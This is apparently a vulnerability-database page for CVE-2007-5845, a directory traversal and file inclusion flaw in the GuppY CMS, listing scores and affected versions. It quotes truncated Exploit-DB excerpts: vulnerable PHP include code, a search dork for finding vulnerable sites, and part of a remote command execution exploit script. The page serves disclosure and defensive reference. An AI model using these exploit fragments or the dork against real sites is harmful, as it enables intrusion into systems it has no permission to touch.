CVE-2007-5845
published 2007-11-06CVE-2007-5845: Directory traversal vulnerability in error.php in GuppY 4.6.3, 4.5.16, and earlier allows remote attackers to include and execute arbitrary local files via a…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.98%
85.6th percentile
Directory traversal vulnerability in error.php in GuppY 4.6.3, 4.5.16, and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the id parameter. NOTE: this can be leveraged to bypass authentication and upload arbitrary files by including admin/inc/upload.inc and specifying certain multipart/form-data input for admin/inc/upload.inc.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| guppy | guppy | <= 4.5.16 | — |
| guppy | guppy | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion
exploitdb·2007-11-03
CVE-2007-5845 GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion
GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion
---
vuln.: GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion
script info and download: http://www.freeguppy.org/
dork: "Site powered by GuppY"
author: irk4z[at]yahoo.pl
greets to: str0ke, rgod, polish under :*
'-----------------------------------------------------------------------------'
# code:
/tinymsg.php, line 24:
...
24 define("CHEMIN", "");
...
/inc/includes.inc, lines 155-168:
...
155 if (isset($selskin)) {
156 $page[14]=$selskin;
157 }
158
159 if (is_file(CHEMIN."skin/".$page[14]."/skin".INCEXT)) {
160 include(CHEMIN."skin/".$page[14]."/skin".INCEXT);
161 } else {
162 include(CHEMIN."skin/no_skin/skin".INCEXT);
163 }
164 if (is_file(CHEMIN."skin/".$page[14]."/confskin".INCEXT)) {
165 include(CHEMIN."skin/".$page[
Exploit-DB
GuppY 4.5.16 - Remote Command Execution
exploitdb·2007-01-29
CVE-2007-5845 GuppY 4.5.16 - Remote Command Execution
GuppY 4.5.16 - Remote Command Execution
---
126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($p
No writeups or analysis indexed.
http://osvdb.org/38492http://retrogod.altervista.org/guppy_4516_cmd.htmlhttps://www.exploit-db.com/exploits/3221https://www.exploit-db.com/exploits/4602http://osvdb.org/38492http://retrogod.altervista.org/guppy_4516_cmd.htmlhttps://www.exploit-db.com/exploits/3221https://www.exploit-db.com/exploits/4602
2007-11-06
Published